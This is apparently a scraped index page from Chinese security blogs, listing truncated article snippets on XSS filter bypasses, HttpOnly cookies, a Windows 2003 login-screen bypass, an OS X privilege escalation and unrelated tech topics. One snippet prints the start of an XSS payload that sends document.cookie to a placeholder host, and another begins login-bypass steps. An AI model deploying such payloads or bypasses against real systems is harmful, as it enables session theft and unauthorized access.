MJP Security Plugin特点如下: 1:扫描可能存在XSS的问题数据库 2:暴力破解 3:检查所有文件的权限 4:检查所有目录中的index.html文件 5:检查wordpress是否...
WooYun-Drops
Bypass IE XSS Filter – livers
http://drops.wooyun.org/tips/159 0x00 背景 从IE8 beta2 开始,微软加入了xss Filter。如同大部分安全产品一样,防护的对策就是利用规则去过滤攻击代...
asp php XSS获取cookie的代码
<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" wi...
Seay信息安全博客
人文创业:打车那些事儿 打车 App 的生存之道
显示不全请点击全屏阅读 商机的由来 在打车应用成长到目前规模的时间里,对它们的质疑从未停止过。的确,国内出租车管理的混乱、落后与行业制度以及牌照管制等外部因素,使得以互联网方式切入市场存在极大的风...
Seay信息安全博客
不要密码win2003漏洞进入系统,XP下测试输入法成
显示不全请点击全屏阅读 这个洞很久之前就知道了,还是转来留到博客里吧, 1.当Win2003启动到出现登录提示界面时,可以按住键盘上的Ctrl+Shift复合键,将输入法调出来; 2.用鼠标右键单击输...
WooYun-Drops
Apple OS X系统中存在可以提升root权限的API后门 –
http://drops.wooyun.org/tips/5566 from:https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-a...
技术
申请Oracle的Arm Accelerator试用VPS
在我们注册甲骨文云的VPS中,很多时候都会需要一张信用卡。但是由于甲骨文云神奇的风控机制,从而导致在国内就算有实体卡也是无法注册的局面。这篇文章就来和大家一起了解Oracle的Arm Accelera...
网络安全
XSS的原理分析与解剖:第三章(技巧篇)
0×01 前言: 关于前两节url: 第一章:http://www.freebuf.com/articles/web/40520.html 第二章:...
神兵利刃
渗透测试报告生成工具-MagicTree
MagicTree是一个渗透测试生产性+工具,它主要设计用来完成简单易懂的数据整合、查询、外部命令执行和渗透测试报告生成。Tree是因为所有的数 据被存储在树形结构中,Magic 是因为它自动实现了渗...
某些浏览器中因cookie设置HttpOnly标志引起的安全问题
1、简介 如果cookie设置了HttpOnly标志,可以在发生XSS时避免JavaScript读取cookie,这也是HttpOnly被引入的原因。但这种方式能防住攻击者吗?HttpOnly标志可以...
